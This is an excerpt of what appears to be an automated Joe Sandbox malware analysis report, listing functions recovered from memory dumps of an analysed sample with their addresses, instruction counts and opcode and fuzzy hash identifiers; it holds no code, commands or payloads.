                    Function 00007FF848F1ADC5 Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54f38bf7af615b695552da704be5b9aec61edfe802e9cf283f6c5660c502dd79
                    • Instruction ID: 0e3690e1a6e9b31aa5caa59029df17807b014643df7e4d132ebaf4a4160bf2a4
                    • Opcode Fuzzy Hash: 54f38bf7af615b695552da704be5b9aec61edfe802e9cf283f6c5660c502dd79
                    • Instruction Fuzzy Hash: 78F08C72D0DA49AFE745EB2898592AD7FB0EF48340F4501E6D408C70D2EB296A998740
                    Function 00007FF848F16839 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b037e897272463b6bf1488606409f520e4188268a1aa6f99b6c094e8ed8c1b1f
                    • Instruction ID: 748fb6b50359e6c7d709365fb459111961f62ea3d693db869bd53645dfcf7777
                    • Opcode Fuzzy Hash: b037e897272463b6bf1488606409f520e4188268a1aa6f99b6c094e8ed8c1b1f
                    • Instruction Fuzzy Hash: D6F04F70C0D68D9FDB51EB68985C2AD7FB0FF26311F1505ABD408D7192E7389944CB01
                    Function 00007FF848F2C689 Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8902c104616770bbdd4a814f93927d1f292b98f493ec62e6e9c6e10d2c1d233
                    • Instruction ID: 9d9fb660a028037471d28913d3e55c1855e37d91ad3f0e2042e26f614e3e08ae
                    • Opcode Fuzzy Hash: b8902c104616770bbdd4a814f93927d1f292b98f493ec62e6e9c6e10d2c1d233
                    • Instruction Fuzzy Hash: C3F0E53680D95C5FE744AF59BC095E67B94FB59318F01026AE48CD2192E7299412C344
                    Function 00007FF848F1E0C2 Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2897c5e8c3bf4a512d3365eb99b1ca1bd107fa2f84415c2ee8e591522f60df6
                    • Instruction ID: 371832de19993b0037fa97725e30257fe3d9ce0e681b682fb6f41c9e3e6c03cc
                    • Opcode Fuzzy Hash: b2897c5e8c3bf4a512d3365eb99b1ca1bd107fa2f84415c2ee8e591522f60df6
                    • Instruction Fuzzy Hash: 3FF0963184E2C59FD312EB7088254E57FB4BF43354F1800FAD045C70E2CA2D5A46C751
                    Function 00007FF848F1C9F1 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03fce2cc9422cec5654f4b9f4856e62b1a55661bb939d17cce86886977f79c21
                    • Instruction ID: ed17fa86cb5201b31bd712eefb877d462b95e9f7690a781c7d371e1271ca58cf
                    • Opcode Fuzzy Hash: 03fce2cc9422cec5654f4b9f4856e62b1a55661bb939d17cce86886977f79c21
                    • Instruction Fuzzy Hash: 70F0E23184D68D8FD716EF1488552E97FA0FF55340F4501BAD408C31C2EB79E964CB80
                    Function 00007FF848F13A80 Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f2b6c1daa2b9e28920a6ebaf3b3c480778c8404a4e0257bef5795995e99d721
                    • Instruction ID: 5c8a6c43e8b2b96c823c0153cb737629657e22356741048449746ec0b70b0a27
                    • Opcode Fuzzy Hash: 4f2b6c1daa2b9e28920a6ebaf3b3c480778c8404a4e0257bef5795995e99d721
                    • Instruction Fuzzy Hash: 73F0FE7181864D9FEB41EF68D4496EA7BB4FF18384F104576E41DC2191EB386594CB84
                    Function 00007FF848F25ABC Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc68aec8a2f162221b51ce70e04abf10182b997703a8b170c3a7bdab2ccad3d8
                    • Instruction ID: c6f58c6665275d19a7331c7a012a13d5dd8910e0ad517f3cbaf5b3354cc5b865
                    • Opcode Fuzzy Hash: dc68aec8a2f162221b51ce70e04abf10182b997703a8b170c3a7bdab2ccad3d8
                    • Instruction Fuzzy Hash: 04E02231A1C96C4FD790BB18F8016A5B7A0FB8A308F0001AAE40CC3181C3665412CB15
                    Function 00007FF848F18BDA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 113d5b924fce808d9f62622faa13f9fd6144479612c1ca59200546519967eb9f
                    • Instruction ID: fb2469c1da766b50b0d296faf2b06ff5c490908b5198f295fec1472bf46cafcb
                    • Opcode Fuzzy Hash: 113d5b924fce808d9f62622faa13f9fd6144479612c1ca59200546519967eb9f
                    • Instruction Fuzzy Hash: B8E01222B1DE2C0F5698E65C78161FDA3C1E788571B4003BFE04DD37D9DE1A5C4202C9
                    Function 00007FF848F1CDDA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a92a767861b03bc10c3e7b6c2db3949aa5041bf84b3f6bbc954a0901879b08ae
                    • Instruction ID: f7aecb24dfe96169bdcaea3eb7d457632f3ce778f3d24dfe2acd02a5bff136ab
                    • Opcode Fuzzy Hash: a92a767861b03bc10c3e7b6c2db3949aa5041bf84b3f6bbc954a0901879b08ae
                    • Instruction Fuzzy Hash: A1F0F831E0852D8EDB54EB44D850BFDB370EF55381F4111BAC04EA2181DFB42E948F44
                    Function 00007FF848F110EA Relevance: .0, Instructions: 31COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ee8af64e2c1a1a58bc1792d34914a3f215a47cddb2a1c5f3515d63ea74260d4
                    • Instruction ID: 1f156f5144f4ee7980bd43c9b75511877568cb9a782f8e1b089b19db2303ce63
                    • Opcode Fuzzy Hash: 2ee8af64e2c1a1a58bc1792d34914a3f215a47cddb2a1c5f3515d63ea74260d4
                    • Instruction Fuzzy Hash: C1E09236D0C94D4FEB90AF68A8066A5FBA4FB86308F000069E55CD3192C7259995C385
                    Function 00007FF848F16680 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8ff3ee48a0b7d0f559fa41b1b7ed0a8f35fcfa1ba6ffc37e6b198cfd8e8d2ec0
                    • Instruction ID: 5156c60d5da4508803a0e6ccb882a6e82d700c5113af5a4a2238d8c3431a91bf
                    • Opcode Fuzzy Hash: 8ff3ee48a0b7d0f559fa41b1b7ed0a8f35fcfa1ba6ffc37e6b198cfd8e8d2ec0
                    • Instruction Fuzzy Hash: 96E0DF31E4C94C8FDB55EB69AC052D876A0FB9D308F00026AE44CC7181E7695D96C705
                    Function 00007FF848F16850 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f2a0b0ad0a175fd25542e6c6a2ea5cfc168c5e9bef7fbd082e433cb540f03197
                    • Instruction ID: 6e2de18bfb50063afc41c4140ef0a684a2c4cd3c29a536b1e66d59e995d0ac28
                    • Opcode Fuzzy Hash: f2a0b0ad0a175fd25542e6c6a2ea5cfc168c5e9bef7fbd082e433cb540f03197
                    • Instruction Fuzzy Hash: 4EF0157081890D9EDB80FBA894486EEBBF4FF28301F10096AE418D2190EB3496908B41
                    Function 00007FF848F14F5C Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3212a31d825d110230c1b3b6e80ed2d8948fbd10bb732e1a09a7e64aa55190d5
                    • Instruction ID: 98f80bef82eba742269f2d55bb526e6a55d7986c43a27cec8dc45ac583a79cfe
                    • Opcode Fuzzy Hash: 3212a31d825d110230c1b3b6e80ed2d8948fbd10bb732e1a09a7e64aa55190d5
                    • Instruction Fuzzy Hash: 80E0DF32D5CA4D8FDB55EF69AC1129877B5FB9D308F00026AE40CCB2C5DB655991C306
                    Function 00007FF848F13B8B Relevance: .0, Instructions: 27COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b7be625acca7ee446c3c62612d3584bf9fefab414be7d644b89e948743ee525f
                    • Instruction ID: 0127f938a21d8217f040fa3bc8a54919db6062db9a0d5217914f33e59e5033bb
                    • Opcode Fuzzy Hash: b7be625acca7ee446c3c62612d3584bf9fefab414be7d644b89e948743ee525f
                    • Instruction Fuzzy Hash: A1F0F230A19A0A9EE6A8FB18C8616A8B2A1EF49754F5000B8D00ED22D2DF396C81CA04
                    Function 00007FF848F25F10 Relevance: .0, Instructions: 18COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db0c75711b394534b2ef9af0e92a682cffe3c250d0b8a0a5f132d1fab9737b21
                    • Instruction ID: f842ea5fab0d955bc52b7bdad2e50a0e5bf76504facf5b536a4a25da0b76ce04
                    • Opcode Fuzzy Hash: db0c75711b394534b2ef9af0e92a682cffe3c250d0b8a0a5f132d1fab9737b21
                    • Instruction Fuzzy Hash: 57D09E70D2D42A8DE9E8B368645513C2191AF4C394FA4C731D00EC15C5EF2F7885664A
                    Function 00007FF848F26A5F Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0cfa4d818c6c6f4760c9965c70a9dbe56d2234320516f2974426d8b61e6eb1c0
                    • Instruction ID: 35468611a26f10f0c15fea569fce6558e9b449df30b604f73517056c18b409ae
                    • Opcode Fuzzy Hash: 0cfa4d818c6c6f4760c9965c70a9dbe56d2234320516f2974426d8b61e6eb1c0
                    • Instruction Fuzzy Hash: 1BD09231A0CD0E9FCF95EA288408A6973E2FBA8391B294525800ED3680DF79F8519B80
                    Function 00007FF848F18BB8 Relevance: .0, Instructions: 17COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 059cf038ccf61f33b05ed89d2f85856d8809e4d0e1df0edc379fbae73d7ce6ba
                    • Instruction ID: b05aa5b596c5be2925e3090021acb4ac0f9c4528c746df85a9cec5b202ce2254
                    • Opcode Fuzzy Hash: 059cf038ccf61f33b05ed89d2f85856d8809e4d0e1df0edc379fbae73d7ce6ba
                    • Instruction Fuzzy Hash: 96D0C771F1CD0F0EEDA8F618003557513C1EB54795F8400B4D40EC31C5DF189C011184
                    Function 00007FF848F269ED Relevance: .0, Instructions: 13COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 44df57d3d549fed3c009eca1add16c2e812e3c4c2dc37b1799a5c2b156494cd8
                    • Instruction ID: 300bc0d2efde24b7f5398330fbf1436c660fa57be713d365c75c0dddc20edea0
                    • Opcode Fuzzy Hash: 44df57d3d549fed3c009eca1add16c2e812e3c4c2dc37b1799a5c2b156494cd8
                    • Instruction Fuzzy Hash: 06D0C93080890D8FDB94EF48D484D6877E0EF28341F1501B5C00EDB2A0CA2AE881DB80
                    Function 00007FF848F13B68 Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37f8298a4a137fee8ad1bfc15fbc4906b799efbf9d5db5cdc070732562bedef2
                    • Instruction ID: 1b4c95f232f5fc32faefaee0019a67e407499691b1c31a28c31c26a50f452c4e
                    • Opcode Fuzzy Hash: 37f8298a4a137fee8ad1bfc15fbc4906b799efbf9d5db5cdc070732562bedef2
                    • Instruction Fuzzy Hash: ABC08C31E0E4076EE294B74858102B862C0DF8A340F9000B8800E820E18E283C028714
                    Function 00007FF848F2BE0D Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f96dc228b7d1a0b8b9ee0e44afd5a4450ba3bce239e5764456897d0fd2067f36
                    • Instruction ID: af0f17298cb291bd2c3bfb27da2557c68e67efe357536d70fee129d986bc04ea
                    • Opcode Fuzzy Hash: f96dc228b7d1a0b8b9ee0e44afd5a4450ba3bce239e5764456897d0fd2067f36
                    • Instruction Fuzzy Hash: 80C0123085C65FCAD765371454172FA17A04F05244F180136DE59008C58A0C2893210F
                    Function 00007FF848F1F89B Relevance: .0, Instructions: 11COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: afd6abc2cd3e3794f80ec4cf06a92657fff46817c16e1bc06f67e986a430d5d3
                    • Instruction ID: 3aa6f265f5340cca0c09213c2714a4b13fd15933e88e4b3dcd3650127b6e1dec
                    • Opcode Fuzzy Hash: afd6abc2cd3e3794f80ec4cf06a92657fff46817c16e1bc06f67e986a430d5d3
                    • Instruction Fuzzy Hash: 0ED0CA32A2D6038DF238BB028160A3A21A1CF40390FB8403EC9AF418C5CF2CBD01630A
                    Function 00007FF848F1EDD1 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcb11de4b6048eb9f750647223fa0eee982fe39b1a796d63ccab2df193677cf3
                    • Instruction ID: 7543cbc44a3c1f5591e0f05b61f17131c0c72d8e9adf734a5908fd06859dd13d
                    • Opcode Fuzzy Hash: bcb11de4b6048eb9f750647223fa0eee982fe39b1a796d63ccab2df193677cf3
                    • Instruction Fuzzy Hash: A0B00224F1C6479FF52472B4085507C15411B453C5F540A35F55B555D7DE5D3C407259

                    Non-executed Functions

                    Function 00007FF848F2A1F6 Relevance: .5, Instructions: 475COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 083f47baeb666b3f6a8ffefdb3837fb3c4118e4e5bb38d41a91f4b456297bb78
                    • Instruction ID: ad7fb38f057adc8b910f6eafa661ea49a9b5e07f2cd9b3d4822fcc27a537329d
                    • Opcode Fuzzy Hash: 083f47baeb666b3f6a8ffefdb3837fb3c4118e4e5bb38d41a91f4b456297bb78
                    • Instruction Fuzzy Hash: F6F1A53090CA8E8FEBA8EF28D8557E937D1FF54350F04426EE84DC7291DB7999858B81

                    Executed Functions

                    Function 00007FF848F11EC3 Relevance: 15.3, Strings: 11, Instructions: 1538COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$[$[$\$]$]$u${${$}$}
                    • API String ID: 0-3490533229
                    • Opcode ID: 7920fbd4dcd4f5c81273f0071990f8514fbafefdd092434aae074a1db8e11f3e
                    • Instruction ID: fadacc724e0af2e956ea330efb939dcdb302b3048a38bce23f81cceef734bfba
                    • Opcode Fuzzy Hash: 7920fbd4dcd4f5c81273f0071990f8514fbafefdd092434aae074a1db8e11f3e
                    • Instruction Fuzzy Hash: 48D2B170D196298FDBA8EF28C8947A9B7B1FF58341F5041AAD00DE3291DB35AE81CF54
                    Function 00007FF848F1124A Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 9aa3557388cb36c074888d310f5c61d8b4dd5e89555f784a2428b45d33ebca8b
                    • Instruction ID: 91463032669bed8e44540c8f5c1449f027028463ba14138258242ca34020d177
                    • Opcode Fuzzy Hash: 9aa3557388cb36c074888d310f5c61d8b4dd5e89555f784a2428b45d33ebca8b
                    • Instruction Fuzzy Hash: C2A17374A18A1D8FDB98EF58C894BA8B7F1FF69301F5541A9D00DE72A5DB74AC81CB00
                    Function 00007FF848F109D3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: aeac199cb9c824f19b19d3f012a2658186a49c216f1ed7beb5e13e650e0fabbb
                    • Instruction ID: 680e35aa409789a1def7e23b2ad2c08c1b23f5124d083912c2fabf654c620d7f
                    • Opcode Fuzzy Hash: aeac199cb9c824f19b19d3f012a2658186a49c216f1ed7beb5e13e650e0fabbb
                    • Instruction Fuzzy Hash: 56E01A31D1892E8EDB84FB58D8595FCB361FB94350F000025D40DD3181DB246C14CB84
                    Function 00007FF848F11751 Relevance: .4, Instructions: 401COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6e97e5836fc8af25469e4125dd6985bbd24d9d69bbe9d382ba26687d2de2a4c0
                    • Instruction ID: 71dda67503e62656229dea1bf872d7466ff297688cc3eaf045617c38c3cebbf8
                    • Opcode Fuzzy Hash: 6e97e5836fc8af25469e4125dd6985bbd24d9d69bbe9d382ba26687d2de2a4c0
                    • Instruction Fuzzy Hash: 98E18A71D1965A9FEB58EB68C8657F8BBB1FF55340F0440BAD00DE3292CB386885CB15
                    Function 00007FF848F14843 Relevance: .2, Instructions: 249COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 27935a639c10ea894a98820fdc4181de5c99aa5811e83b2d5615930b08926c6a
                    • Instruction ID: 8ed3c0f77aea815fc66b2258fbf3b4a9c262ce1d787202ea123a27326834ac1c
                    • Opcode Fuzzy Hash: 27935a639c10ea894a98820fdc4181de5c99aa5811e83b2d5615930b08926c6a
                    • Instruction Fuzzy Hash: BD91D370D19A1D9FDB94EFA8C845BADBBB1FF58340F5041AAD00DE3292DB3869858B44
                    Function 00007FF848F11831 Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e2ffe0461bc504c522382719efae6efdce49eea17c7985c57cf99ca949e70c5
                    • Instruction ID: 6fa0c3237c7bc597967277abb76659e00419ef1cf79fd2866a92e138ce022a84
                    • Opcode Fuzzy Hash: 1e2ffe0461bc504c522382719efae6efdce49eea17c7985c57cf99ca949e70c5
                    • Instruction Fuzzy Hash: EB913C71D1995A9FEB98EB68C4A57B8B7B1FF55340F1440B9C00DE7292CF386884CB15
                    Function 00007FF848F14345 Relevance: .2, Instructions: 231COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed562d1b43f7924cb3b27c750cdb06ad17b002e29e996cf6ddeec5277a087022
                    • Instruction ID: e35d90f4b16112263b52958fa827cb859fd2ae9f32a75b02160f994bc6b607f8
                    • Opcode Fuzzy Hash: ed562d1b43f7924cb3b27c750cdb06ad17b002e29e996cf6ddeec5277a087022
                    • Instruction Fuzzy Hash: BF816A72C1E6C65FE315AF2868550B97FA2FFB2794F1800BAD448871C7CE196C098399
                    Function 00007FF848F10DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d10c569e0b819d25b4db671a7368e40ee0d2683cabf1e043a0cf08fee9d690db
                    • Instruction ID: 01180ffb0caa9660d632ed9cb2da4e5e27a163bab230f735c82bebd8c19c3c3a
                    • Opcode Fuzzy Hash: d10c569e0b819d25b4db671a7368e40ee0d2683cabf1e043a0cf08fee9d690db
                    • Instruction Fuzzy Hash: 54715A30A1995E8FDB84FF58C895AEAB7B1FF98340F1445B5D40DD7296CE38A881CB90
                    Function 00007FF848F108B1 Relevance: .2, Instructions: 210COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7428563befaeb922745467ae03eac936984e27f76d24fd547b8731ed0dca749e
                    • Instruction ID: 613556d536c69de8cef196e96037c4c340fc9c34c0ff9468fc9aea5986a96d49
                    • Opcode Fuzzy Hash: 7428563befaeb922745467ae03eac936984e27f76d24fd547b8731ed0dca749e
                    • Instruction Fuzzy Hash: AD618E3190CA6E8FEB98FF68C8986A9B7A1FF98341F54017AD409D72D1DF35A841CB44
                    Function 00007FF848F14F5C Relevance: .2, Instructions: 193COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000008.00000002.2131499749.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ff848f10000_staticfile.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c95ff66d8637e04e69a854d47020a3b4b805471692a11302a278a9162c5f65ad
